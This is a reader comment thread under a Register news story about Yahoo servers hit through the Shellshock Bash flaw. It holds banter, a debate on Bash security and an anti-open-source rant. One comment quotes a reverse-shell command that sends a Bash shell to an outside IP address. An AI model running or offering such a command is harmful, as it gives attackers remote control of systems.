back to article Yahoo servers? SHELLSHOCKED? by Bash?

Yahoo! said "a handful" of its servers fell to hackers who may have been trying to exploit the Shellshock vulnerability in Bash. The miscreants took control of the web servers to build a botnet out of them, it is claimed. "As soon as we became aware of the issue, we began patching our systems and have been closely monitoring …

  1. psychonaut

    living under a rock

    "As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network," a Yahoo! spokesperson told The Register in an emailed statement.

    its even been on the bbc ffs.

    1. Anonymous Coward
      Anonymous Coward

      Re: living under a rock

      "The miscreants took control of the web servers to build a botnet out of them, it's claimed."

      Well I guess it's not like they have any user data on them to steal...

    2. RISC OS

      Re: living under a rock

      Right on... once you have read it on the bbc you know it's already old

  2. Daniel B.
    Coat

    Lycos?

    It still exists??

    1. present_arms

      Re: Lycos?

      Yes, Yes it does

      1. Anonymous Coward
        Anonymous Coward

        Re: Lycos?t

        But it's not who it used to be.

    2. fishbone

      Re: Lycos?

      Not trying to stray from the point but what does that icon represent?

    3. captain veg Silver badge

      Re: Lycos?

      And WinZip? Why does the world need that? Windows Explorer can mount Zip archives since, I dunno, 2000?

      -A.

  3. This post has been deleted by a moderator

  4. Brian Miller

    Bash is Bollocks for security

    Why in the world Bash isn't deleted from any Internet-facing system, I have no idea. If you look at John Hall's code, it's Bash itself that's making a connection back to Hall's servers. I can imagine that a complete evil server system could be hidden in Bash environmental variables. A "minimal system" should be exactly that, with minimal functionality.

    1. Destroy All Monsters Silver badge
      Holmes

      Re: Bash is Bollocks for security

      Amazingly, a tool is being used as a tool.

      Even in a "minimal system" the tools to do maintenance must still be available from time to time. Unless we are talking embedded.

      Whether "Bash is Bollocks for security" is neither here nor there.

      The error here consists in making the swiss army knife usable from outside. That is a combination of using shell scripts to process the "Agent" header and having that bash bug. The error does not consist in having the swiss army knife available in the first place.

      "/bin/bash –i >&/dev/tcp/199.175.52.92/2221 0>&1" does not do a whole lot. Would it work with any other shell on a system which has nice features underneath /dev/tcp? I sure hope so.

      Why use shell scripts to process that "Agent" header? Well, now, that is the REAL question. They should have been gotten rid of some time ago.

    2. Anonymous Coward
      Anonymous Coward

      Re: Bash is Bollocks for security

      "Bash is Bollocks"? It's not just Bash, the entire F/OSS eco-system is riddled with failure. Need I mention Heartbleed? They tout the "many eyes" myth, but as no one actually looks the bugs go unfound.

      F/OSS is based on the communist hippy idea that life is all love and cuddles. It isn't. Life is hard and there are assholes at every turn. If you are deploying new servers and you want something that will actually work, for the sake of your security do not deploy F/OSS.

      There is a very good reason Windows is the dominant OS in the server room (circa 75%), dominant on the desktop (circa 90%) and taking ground for all comers on mobile.

      1. Fatman
        Joke

        Re: Bash is Bollocks for security

        Is that YOU, Loverock Davidson???

        ZDNet readers know who I am referring to.

      2. 080

        Re: Bash is Bollocks for security

        He He He, you've gorra larf, eh?

      3. Someone Else Silver badge
        Flame

        @AC -- Re: Bash is Bollocks for security

        Life is hard and there are assholes at every turn.

        I see you've been looking in the mirror.

        1. Anonymous Coward
          Anonymous Coward

          Re: @AC -- Bash is Bollocks for security

          "Someone Else" as you have to resort to personal attacks, you clearly have no argument.

  5. Amorous Cowherder
    Pint

    No! We! Are! Not! Trying! To! Milk! This! For! Publicity! Purposes! Cos! Google! And! Even! Bing! Are! Beating! Us! In! The! Search! Game! And! All! We! Have! Left! Worth! Anything! Is! Flickr!

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2021